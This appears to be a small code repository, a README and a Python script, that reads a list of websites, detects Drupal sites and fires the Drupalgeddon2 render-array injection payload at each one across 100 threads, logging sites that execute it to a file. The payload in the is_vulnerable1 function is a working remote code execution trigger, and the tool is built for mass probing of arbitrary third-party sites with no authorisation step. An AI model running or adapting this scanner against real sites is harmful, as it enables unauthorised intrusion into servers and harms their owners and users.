├── README.md
└── scan.py


/README.md:
--------------------------------------------------------------------------------
 1 | # What am I checking out?  
 2 | Multithreaded script to scan websites list against Drupalgeddon2  
 3 | Basic version coded for personal usage , but no problem from sharing I guess  
 4 | I know it can be coded in couple bash lines , but who care???  
 5 | Found bug?!  
 6 | You're awesome , Fix it or code it from zero am not intending to update a single line in this rep xD  
 7 | # Installation and usage  
 8 | Read the wiki  
 9 | Am kidding , just find the libraries needed by the script , install it and u r ready to go  
10 | 


--------------------------------------------------------------------------------
/scan.py:
--------------------------------------------------------------------------------
 1 | # Coded by Ahmed sultan (@0x4148)
 2 | import os
 3 | import workerpool
 4 | import requests
 5 | from lxml.html import fromstring
 6 | import sys
 7 | import re
 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
 9 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
10 | siteslistx=sys.argv[1]
11 | temp="{0:10}"
12 | 
13 | 
14 | def check_if_drupal(host):
15 | 	temp="{0:10}"
16 | 	headers = {
17 | 	'User-Agent': 'Firefox/58.0',
18 | 	'Accept-Language': 'en-US,en;q=0.5',
19 | 	}
20 | 	try:
21 | 		myopen = requests.get(host,timeout=5,allow_redirects=True,headers=headers)
22 | 	except:
23 | 		return 0
24 | 	response = myopen.text
25 | 	if response.find("sites/all/")!=-1:
26 | 		print temp.format("\033[95m + Drupal detected @ "+host+"\n\033[0m"),
27 | 		xx=open("drupal.txt","ab")
28 | 		xx.write(host+"\r\n")
29 | 		xx.close()
30 | 		return 1
31 | 	return 0
32 | 
33 | def is_vulnerable1(HOST):
34 | 	get_params = {'q':'user/password', 'name[#post_render][]':'printf', 'name[#markup]':'Jnkfoooo', 'name[#type]':'markup'}
35 | 	post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
36 | 	headers = {
37 | 	'User-Agent': 'Firefox/58.0',
38 | 	'Accept-Language': 'en-US,en;q=0.5',
39 | 	}
40 | 	r = requests.post(HOST, data=post_params, params=get_params,headers=headers)
41 | 	m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
42 | 	if m:
43 | 	    found = m.group(1)
44 | 	    get_params = {'q':'file/ajax/name/#value/' + found}
45 | 	    post_params = {'form_build_id':found}
46 | 	    r = requests.post(HOST, data=post_params, params=get_params)
47 | 	    if re.match(r'^Jnkfooo.*',r.text):
48 | 	    	print temp.format("\033[92m + "+HOST+" is vulnerable \033[0m\n"),
49 | 	    	pew=open("vuln.txt","ab")
50 | 	    	pew.write(HOST+"\r\n")
51 | 	    	pew.close()
52 | 	    	return 1
53 | 	    else:
54 | 	    	return 0
55 | 
56 | def scan(host):
57 | 	host=host.strip("\r\n")+"/"
58 | 	is_drupal=check_if_drupal(host)
59 | 	if is_drupal == 1:
60 | 		is_vulnerable1(host)
61 | 
62 | print "+ Drupal scanner module launched"
63 | print "! Processing websites from "+siteslistx
64 | siteslist=open(siteslistx,"r")
65 | pool = workerpool.WorkerPool(size=100)
66 | pool.map(scan, siteslist)
67 | pool.shutdown()
68 | pool.wait()
69 | print "! Done"
70 | sys.exit()
71 | 


--------------------------------------------------------------------------------